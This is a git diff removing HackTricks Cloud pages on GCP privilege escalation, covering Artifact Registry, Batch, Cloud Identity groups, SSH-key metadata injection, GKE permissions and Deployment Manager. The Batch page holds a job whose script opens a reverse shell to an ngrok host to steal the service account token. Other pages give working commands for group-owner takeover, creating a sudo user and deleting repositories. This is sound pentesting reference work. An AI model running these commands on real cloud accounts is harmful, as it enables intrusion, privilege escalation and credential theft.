- -{% hint style="danger" %} -It's not possible to upload a python library with the same version as the one already present, but it's possible to upload **greater versions** (or add an extra **`.0` at the end** of the version if that works -not in python though-), or to **delete the last version an upload a new one with** (needed `artifactregistry.versions.delete)`**:** - -{% code overflow="wrap" %} -```sh -gcloud artifacts versions delete --repository= --location= --package= -``` -{% endcode %} -{% endhint %} - -### `artifactregistry.repositories.downloadArtifacts` - -With this permission you can **download artifacts** and search for **sensitive information** and **vulnerabilities**. - -Download a **Docker** image: - -```sh -# Configure docker to use gcloud to authenticate with Artifact Registry -gcloud auth configure-docker -docker.pkg.dev - -# Dowload image -docker pull -docker.pkg.dev///: -``` - -Download a **python** library: - -{% code overflow="wrap" %} -```bash -pip install --index-url "https://oauth2accesstoken:$(gcloud auth print-access-token)@-python.pkg.dev///simple/" --trusted-host -python.pkg.dev --no-cache-dir -``` -{% endcode %} - -* What happens if a remote and a standard registries are mixed in a virtual one and a package exists in both? Check this page: - -{% content-ref url="../gcp-persistence/gcp-artifact-registry-persistence.md" %} -[gcp-artifact-registry-persistence.md](../gcp-persistence/gcp-artifact-registry-persistence.md) -{% endcontent-ref %} - -### `artifactregistry.tags.delete`, `artifactregistry.versions.delete`, `artifactregistry.packages.delete`, (`artifactregistry.repositories.get`, `artifactregistry.tags.get`, `artifactregistry.tags.list`) - -Delete artifacts from the registry, like docker images: - -{% code overflow="wrap" %} -```bash -# Delete a docker image -gcloud artifacts docker images delete -docker.pkg.dev///: -``` -{% endcode %} - -### `artifactregistry.repositories.delete` - -Detele a full repository (even if it has content): - -{% code overflow="wrap" %} -``` -gcloud artifacts repositories delete --location= -``` -{% endcode %} - -### `artifactregistry.repositories.setIamPolicy` - -An attacker with this permission could give himself permissions to perform some of the previously mentioned repository attacks. - -### Pivoting to other Services through Artifact Registry Read & Write - -* **Cloud Functions** - -When a Cloud Function is created a new docker image is pushed to the Artifact Registry of the project. I tried to modify the image with a new one, and even delete the current image (and the `cache` image) and nothing changed, the cloud function continue working. Therefore, maybe it **might be possible to abuse a Race Condition attack** like with the bucket to change the docker container that will be run but **just modifying the stored image isn't possible to compromise the Cloud Function**. - -* **App Engine** - -Even though App Engine creates docker images inside Artifact Registry. It was tested that **even if you modify the image inside this service** and removes the App Engine instance (so a new one is deployed) the **code executed doesn't change**.\ -It might be possible that performing a **Race Condition attack like with the buckets it might be possible to overwrite the executed code**, but this wasn't tested. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md deleted file mode 100644 index 7f41fa8b8..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md +++ /dev/null @@ -1,84 +0,0 @@ -# GCP - Batch Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Batch - -Basic information: - -{% content-ref url="../gcp-services/gcp-batch-enum.md" %} -[gcp-batch-enum.md](../gcp-services/gcp-batch-enum.md) -{% endcontent-ref %} - -### `batch.jobs.create`, `iam.serviceAccounts.actAs` - -It's possible to create a batch job, get a reverse shell and exfiltrate the metadata token of the SA (compute SA by default). - -```bash -gcloud beta batch jobs submit job-lxo3b2ub --location us-east1 --config - <& /dev/tcp/8.tcp.ngrok.io/10396 0>&1'\n" - } - } - ], - "volumes": [] - } - } - ], - "allocationPolicy": { - "instances": [ - { - "policy": { - "provisioningModel": "STANDARD", - "machineType": "e2-micro" - } - } - ] - }, - "logsPolicy": { - "destination": "CLOUD_LOGGING" - } -} -EOD -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md deleted file mode 100644 index d8c3facd3..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md +++ /dev/null @@ -1,54 +0,0 @@ -# GCP - ClientAuthConfig Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Create OAuth Brand and Client - -[**According to the docs**](https://cloud.google.com/iap/docs/programmatic-oauth-clients), these are the required permissions: - -* `clientauthconfig.brands.list` -* `clientauthconfig.brands.create` -* `clientauthconfig.brands.get` -* `clientauthconfig.clients.create` -* `clientauthconfig.clients.listWithSecrets` -* `clientauthconfig.clients.getWithSecret` -* `clientauthconfig.clients.delete` -* `clientauthconfig.clients.update` - -{% code overflow="wrap" %} -```bash -# Create a brand -gcloud iap oauth-brands list -gcloud iap oauth-brands create --application_title=APPLICATION_TITLE --support_email=SUPPORT_EMAIL -# Create a client of the brand -gcloud iap oauth-clients create projects/PROJECT_NUMBER/brands/BRAND-ID --display_name=NAME -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md deleted file mode 100644 index 3d7d16fef..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md +++ /dev/null @@ -1,64 +0,0 @@ -# GCP - Cloudidentity Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloudidentity - -For more information about the cloudidentity service, check this page: - -{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %} -[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md) -{% endcontent-ref %} - -### Add yourself to a group - -If your user has enough permissions or the group is misconfigured, he might be able to make himself a member of a new group: - -{% code overflow="wrap" %} -```bash -gcloud identity groups memberships add --group-email --member-email [--roles OWNER] -# If --roles isn't specified you will get MEMBER -``` -{% endcode %} - -### Modify group membership - -If your user has enough permissions or the group is misconfigured, he might be able to make himself OWNER of a group he is a member of: - -{% code overflow="wrap" %} -```bash -# Check the current membership level -gcloud identity groups memberships describe --member-email --group-email - -# If not OWNER try -gcloud identity groups memberships modify-membership-roles --group-email --member-email --add-roles=OWNER -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md deleted file mode 100644 index c762f6c84..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md +++ /dev/null @@ -1,115 +0,0 @@ -# GCP - Add Custom SSH Metadata - -## GCP - Add Custom SSH Metadata - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Modifying the metadata - -Metadata modification on an instance could lead to **significant security risks if an attacker gains the necessary permissions**. - -#### **Incorporation of SSH Keys into Custom Metadata** - -On GCP, **Linux systems** often execute scripts from the [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts). A critical component of this is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which is designed to **regularly check** the instance metadata endpoint for **updates to the authorized SSH public keys**. - -Therefore, if an attacker can modify custom metadata, he could make the the daemon find a new public key, which will processed and **integrated into the local system**. The key will be added into `~/.ssh/authorized_keys` file of an **existing user or potentially creating a new user with `sudo` privileges**, depending on the key's format. And the attacker will be able to compromise the host. - -#### **Add SSH key to existing privileged user** - -1. **Examine Existing SSH Keys on the Instance:** - * Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under `metadata`, specifically the `ssh-keys` key. - - ```bash - gcloud compute instances describe [INSTANCE] --zone [ZONE] - ``` - * Pay attention to the format of the SSH keys: the username precedes the key, separated by a colon. -2. **Prepare a Text File for SSH Key Metadata:** - * Save the details of usernames and their corresponding SSH keys into a text file named `meta.txt`. This is essential for preserving the existing keys while adding new ones. -3. **Generate a New SSH Key for the Target User (`alice` in this example):** - * Use the `ssh-keygen` command to generate a new SSH key, ensuring that the comment field (`-C`) matches the target username. - - ```bash - ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub - ``` - * Add the new public key to `meta.txt`, mimicking the format found in the instance's metadata. -4. **Update the Instance's SSH Key Metadata:** - * Apply the updated SSH key metadata to the instance using the `gcloud compute instances add-metadata` command. - - ```bash - gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt - ``` -5. **Access the Instance Using the New SSH Key:** - * Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (`alice` in this example). - - ```bash - ssh -i ./key alice@localhost - sudo id - ``` - -#### **Create a new privileged user and add a SSH key** - -If no interesting user is found, it's possible to create a new one which will be given `sudo` privileges: - -```bash -# define the new account username -NEWUSER="definitelynotahacker" - -# create a key -ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P "" - -# create the input meta file -NEWKEY="$(cat ./key.pub)" -echo "$NEWUSER:$NEWKEY" > ./meta.txt - -# update the instance metadata -gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt - -# ssh to the new account -ssh -i ./key "$NEWUSER"@localhost -``` - -#### SSH keys at project level - -It's possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by **applying SSH keys at the project level**. This approach allows SSH access to any instance within the project that hasn't explicitly blocked project-wide SSH keys. Here's a summarized guide: - -1. **Apply SSH Keys at the Project Level:** - * Use the `gcloud compute project-info add-metadata` command to add SSH keys from `meta.txt` to the project's metadata. This action ensures that the SSH keys are recognized across all VMs in the project, unless a VM has the "Block project-wide SSH keys" option enabled. - - ```bash - gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt - ``` -2. **SSH into Instances Using Project-Wide Keys:** - * With project-wide SSH keys in place, you can SSH into any instance within the project. Instances that do not block project-wide keys will accept the SSH key, granting access. - * A direct method to SSH into an instance is using the `gcloud compute ssh [INSTANCE]` command. This command uses your current username and the SSH keys set at the project level to attempt access. - -## References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md deleted file mode 100644 index 0599a6328..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md +++ /dev/null @@ -1,118 +0,0 @@ -# GCP - Container Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## container - -### `container.clusters.get` - -This permission allows to **gather credentials for the Kubernetes cluster** using something like: - -```bash -gcloud container clusters get-credentials --zone -``` - -Without extra permissions, the credentials are pretty basic as you can **just list some resource**, but hey are useful to find miss-configurations in the environment. - -{% hint style="info" %} -Note that **kubernetes clusters might be configured to be private**, that will disallow that access to the Kube-API server from the Internet. -{% endhint %} - -If you don't have this permission you can still access the cluster, but you need to **create your own kubectl config file** with the clusters info. A new generated one looks like this: - -```yaml -apiVersion: v1 -clusters: -- cluster: - certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUVMRENDQXBTZ0F3SUJBZ0lRRzNaQmJTSVlzeVRPR1FYODRyNDF3REFOQmdrcWhraUc5dzBCQVFzRkFEQXYKTVMwd0t3WURWUVFERXlRMk9UQXhZVEZoWlMweE56ZGxMVFF5TkdZdE9HVmhOaTAzWVdFM01qVmhNR05tTkdFdwpJQmNOTWpJeE1qQTBNakl4T1RJMFdoZ1BNakExTWpFeE1qWXlNekU1TWpSYU1DOHhMVEFyQmdOVkJBTVRKRFk1Ck1ERmhNV0ZsTFRFM04yVXROREkwWmkwNFpXRTJMVGRoWVRjeU5XRXdZMlkwWVRDQ0FhSXdEUVlKS29aSWh2Y04KQVFFQkJRQURnZ0dQQURDQ0FZb0NnZ0dCQU00TWhGemJ3Y3VEQXhiNGt5WndrNEdGNXRHaTZmb0pydExUWkI4Rgo5TDM4a2V2SUVWTHpqVmtoSklpNllnSHg4SytBUHl4RHJQaEhXMk5PczFNMmpyUXJLSHV6M0dXUEtRUmtUWElRClBoMy9MMDVtbURwRGxQK3hKdzI2SFFqdkE2Zy84MFNLakZjRXdKRVhZbkNMMy8yaFBFMzdxN3hZbktwTWdKVWYKVnoxOVhwNEhvbURvOEhUN2JXUTJKWTVESVZPTWNpbDhkdDZQd3FUYmlLNjJoQzNRTHozNzNIbFZxaiszNy90RgpmMmVwUUdFOG90a0VVOFlHQ3FsRTdzaVllWEFqbUQ4bFZENVc5dk1RNXJ0TW8vRHBTVGNxRVZUSzJQWk1rc0hyCmMwbGVPTS9LeXhnaS93TlBRdW5oQ2hnRUJIZTVzRmNxdmRLQ1pmUFovZVI1Qk0vc0w1WFNmTE9sWWJLa2xFL1YKNFBLNHRMVmpiYVg1VU9zMUZIVXMrL3IyL1BKQ2hJTkRaVTV2VjU0L1c5NWk4RnJZaUpEYUVGN0pveXJvUGNuMwpmTmNjQ2x1eGpOY1NsZ01ISGZKRzZqb0FXLzB0b2U3ek05RHlQOFh3NW44Zm5lQm5aVTFnYXNKREZIYVlZbXpGCitoQzFETmVaWXNibWNxOGVPVG9LOFBKRjZ3SURBUUFCbzBJd1FEQU9CZ05WSFE4QkFmOEVCQU1DQWdRd0R3WUQKVlIwVEFRSC9CQVV3QXdFQi96QWRCZ05WSFE0RUZnUVU5UkhvQXlxY3RWSDVIcmhQZ1BjYzF6Sm9kWFV3RFFZSgpLb1pJaHZjTkFRRUxCUUFEZ2dHQkFLbnp3VEx0QlJBVE1KRVB4TlBNbmU2UUNqZDJZTDgxcC9oeVc1eWpYb2w5CllkMTRRNFVlVUJJVXI0QmJadzl0LzRBQ3ZlYUttVENaRCswZ2wyNXVzNzB3VlFvZCtleVhEK2I1RFBwUUR3Z1gKbkJLcFFCY1NEMkpvZ29tT3M3U1lPdWVQUHNrODVvdWEwREpXLytQRkY1WU5ublc3Z1VLT2hNZEtKcnhuYUVGZAprVVl1TVdPT0d4U29qVndmNUsyOVNCbGJ5YXhDNS9tOWkxSUtXV2piWnZPN0s4TTlYLytkcDVSMVJobDZOSVNqCi91SmQ3TDF2R0crSjNlSjZneGs4U2g2L28yRnhxZWFNdDladWw4MFk4STBZaGxXVmlnSFMwZmVBUU1NSzUrNzkKNmozOWtTZHFBYlhPaUVOMzduOWp2dVlNN1ZvQzlNUk1oYUNyQVNhR2ZqWEhtQThCdlIyQW5iQThTVGpQKzlSMQp6VWRpK3dsZ0V4bnFvVFpBcUVHRktuUTlQcjZDaDYvR0xWWStqYXhuR3lyUHFPYlpNZTVXUDFOUGs4NkxHSlhCCjc1elFvanEyRUpxanBNSjgxT0gzSkxOeXRTdmt4UDFwYklxTzV4QUV0OWxRMjh4N28vbnRuaWh1WmR6M0lCRU8KODdjMDdPRGxYNUJQd0hIdzZtKzZjUT09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K - server: https://34.123.141.28 - name: gke_security-devbox_us-central1_autopilot-cluster-1 -contexts: -- context: - cluster: gke_security-devbox_us-central1_autopilot-cluster-1 - user: gke_security-devbox_us-central1_autopilot-cluster-1 - name: gke_security-devbox_us-central1_autopilot-cluster-1 -current-context: gke_security-devbox_us-central1_autopilot-cluster-1 -kind: Config -preferences: {} -users: -- name: gke_security-devbox_us-central1_autopilot-cluster-1 - user: - auth-provider: - config: - access-token: - cmd-args: config config-helper --format=json - cmd-path: gcloud - expiry: "2022-12-06T01:13:11Z" - expiry-key: '{.credential.token_expiry}' - token-key: '{.credential.access_token}' - name: gcp -``` - -### `container.roles.escalate` | `container.clusterRoles.escalate` - -**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update Roles/ClusterRoles with more permissions** that ones he held, effectively bypassing the Kubernetes protection against this behaviour. - -**`container.roles.create`** and/or **`container.roles.update`** OR **`container.clusterRoles.create`** and/or **`container.clusterRoles.update`** respectively are **also** **necessary** to perform those privilege escalation actions. - -### `container.roles.bind` | `container.clusterRoles.bind` - -**Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update RolesBindings/ClusterRolesBindings with more permissions** that ones he has, effectively bypassing the Kubernetes protection against this behaviour. - -**`container.roleBindings.create`** and/or **`container.roleBindings.update`** OR **`container.clusterRoleBindings.create`** and/or **`container.clusterRoleBindings.update`** respectively are also **necessary** to perform those privilege escalation actions. - -### `container.cronJobs.create` | `container.cronJobs.update` | `container.daemonSets.create` | `container.daemonSets.update` | `container.deployments.create` | `container.deployments.update` | `container.jobs.create` | `container.jobs.update` | `container.pods.create` | `container.pods.update` | `container.replicaSets.create` | `container.replicaSets.update` | `container.replicationControllers.create` | `container.replicationControllers.update` | `container.scheduledJobs.create` | `container.scheduledJobs.update` | `container.statefulSets.create` | `container.statefulSets.update` - -All these permissions are going to allow you to **create or update a resource** where you can **define** a **pod**. Defining a pod you can **specify the SA** that is going to be **attached** and the **image** that is going to be **run**, therefore you can run an image that is going to **exfiltrate the token of the SA to your server** allowing you to escalate to any service account.\ -For more information check: - -As we are in a GCP environment, you will also be able to **get the nodepool GCP SA** from the **metadata** service and **escalate privileges in GC**P (by default the compute SA is used). - -### `container.secrets.get` | `container.secrets.list` - -As [**explained in this page**, ](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#listing-secrets)with these permissions you can **read** the **tokens** of all the **SAs of kubernetes**, so you can escalate to them. - -### `container.pods.exec` - -With this permission you will be able to **exec into pods**, which gives you **access** to all the **Kubernetes SAs running in pods** to escalate privileges within K8s, but also you will be able to **steal** the **GCP Service Account** of the **NodePool**, **escalating privileges in GCP**. - -### `container.pods.portForward` - -As **explained in this page**, with these permissions you can **access local services** running in **pods** that might allow you to **escalate privileges in Kubernetes** (and in **GCP** if somehow you manage to talk to the metadata service)**.** - -### `container.serviceAccounts.createToken` - -Because of the **name** of the **permission**, it **looks like that it will allow you to generate tokens of the K8s Service Accounts**, so you will be able to **privesc to any SA** inside Kubernetes. However, I couldn't find any API endpoint to use it, so let me know if you find it. - -### `container.mutatingWebhookConfigurations.create` | `container.mutatingWebhookConfigurations.update` - -These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to **persist in the cluster**.\ -For more information [**follow this link**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#malicious-admission-controller). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md deleted file mode 100644 index 38c2f36ce..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md +++ /dev/null @@ -1,55 +0,0 @@ -# GCP - Deploymentmaneger Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## deploymentmanager - -### `deploymentmanager.deployments.create` - -This single permission lets you **launch new deployments** of resources into GCP with arbitrary service accounts. You could for example launch a compute instance with a SA to escalate to it. - -You could actually **launch any resource** listed in `gcloud deployment-manager types list` - -In the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) following[ **script**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance, however that script won't work. Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh)**.** - -### `deploymentmanager.deployments.update` - -This is like the previous abuse but instead of creating a new deployment, you modifies one already existing (so be careful) - -Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh)**.** - -### `deploymentmanager.deployments.setIamPolicy` - -This is like the previous abuse but instead of directly creating a new deployment, you first give you that access and then abuses the permission as explained in the previous _deploymentmanager.deployments.create_ section. - -## References - -* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
